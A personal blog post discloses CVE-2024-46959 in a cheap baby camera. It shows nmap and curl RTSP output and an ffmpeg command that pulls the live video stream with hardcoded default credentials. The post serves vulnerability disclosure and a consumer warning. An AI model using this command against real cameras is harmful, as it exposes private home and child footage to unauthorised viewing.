Home Music Blog Digital Alchemy Gates

CVE-2024-46959 - hacking the runofast 10$ baby cam with firmware version CloudCam 57.0.0.1

posted on : 9/07/2024

so vulnerable!!!!

my first hacking blog poast whoa

good evening. so this story begins in the middle of the night when i was really bored and wanted to find something to hack. i had made the rounds on my home network and it really wasnt working out. so i took a chance and bought some security cams on the web and a day later two arrived at my door.


tonight's victim!

so asclepius, what happened?

the cameras turned out to be really shitty as expected, but today ill be focusing on the runofast one, becuase i think it's the easier one. so i ran some nmap scans on it we all do, output follows. (censoring out the last two octets of the addr becasue im cool)

    

        Starting Nmap 7.95 ( https://nmap.org ) at 2024-08-04 21:56 PDT
        Nmap scan report for 192.168.xx.xx
        Host is up (0.019s latency).
        Not shown: 997 closed tcp ports (conn-refused)
        PORT     STATE SERVICE
        80/tcp   open  http
        554/tcp  open  rtsp
        8001/tcp open  vcom-tunnel
        
        Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds

now i had no idea wtf an rtsp was!! however i did have the ability to use a -A flag, which turned the 8001 into rtsp too...so i did some reasrch into some flags that i was getting returned when i curled it.

    
        *   Trying 192.168.xx.xx:8001...
* Connected to 192.168.xx.xx (192.168.1.12) port 8001
> OPTIONS * RTSP/1.0
> CSeq: 1
> User-Agent: curl/8.9.0
> 
* Request completely sent off
< RTSP/1.0 200 OK
< CSeq: 1
< Server: TAS-Tech Streaming Server V100R001
< Public: DESCRIBE, SET_PARAMETER, SETUP, TEARDOWN, PAUSE, PLAY
< 
* Connection #0 to host 192.168.xx.xx left intact

this was a little weird! at this point i had tried to run the descirbe, play, and other params like that into the curl command. during this, i also ran it with the root:password params just to see if it work. no dice!!!! say...this was the real time streaming protcol....

SO! i went to our lord and savior, ffmpeg and decied to just test some params in it and it did not look good! here's the command:

    
        ffmpeg -i rtsp://root:[email protected]:554/stream1 -rtsp_transport tcp -c copy -t 00:00:01 554.mp4

doctors hate her! she took one command this was the result:

that's me! through the camera! with basic creds! which is not at all like safe. i kinda broke it before i could test more creds to see if it even was default credential issue vs a broken access one, so give me $$$ to get another one if you want a continueation of it!

so i also after the fact tried to find the company's yknow email or anything to say hey i can see myself in your camera! but alas i couldn't. if you are from that company and care about this at all heyyyy this is really insecure and bad. if you value your privacy i would not buy this at all tbh. again, this credential cannot be changed in any way that i've seen, meaning this thing comes with unchangable hardcoded credentials that are basic and at the top of all wordlists out there.

final words:

thanks for reading my first ever actual hacking post, idk if this is a vuln or a cve or whatever but here u go!!
What Are You Looking For? A Vision?